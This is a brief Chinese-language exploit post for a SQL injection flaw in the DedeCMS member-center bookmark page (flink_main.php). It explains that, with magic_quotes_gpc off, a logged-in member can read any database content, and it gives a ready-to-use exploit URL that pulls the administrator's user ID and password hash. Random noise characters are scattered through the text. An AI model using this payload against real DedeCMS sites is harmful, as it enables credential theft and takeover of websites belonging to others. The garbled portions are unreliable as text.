DedeCMS会员中心SQL注射漏洞
% H m4 b1 ^5 ?* a3 G, e; B需要magic_quotes_gpc = Off0 I* I# ?. @7 g* e: U6 S; S
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.. w7 c7 B, c, k7 O8 x- q2 E
7 [3 a* R) Z# I Q. R6 k( bDedeCMS会员中心书签管理SQL注射漏洞
. S8 D8 w. c& z- ?+ Q成功利用该漏洞可获得管理员密码
% g/ G2 q/ ^. p5 P % Q! m' w! M5 T; X: C" j8 h
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
3 E3 c" K" y( @. K ] n& P. O- m$ y- K
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r& {7 C: K [, p. \ p
|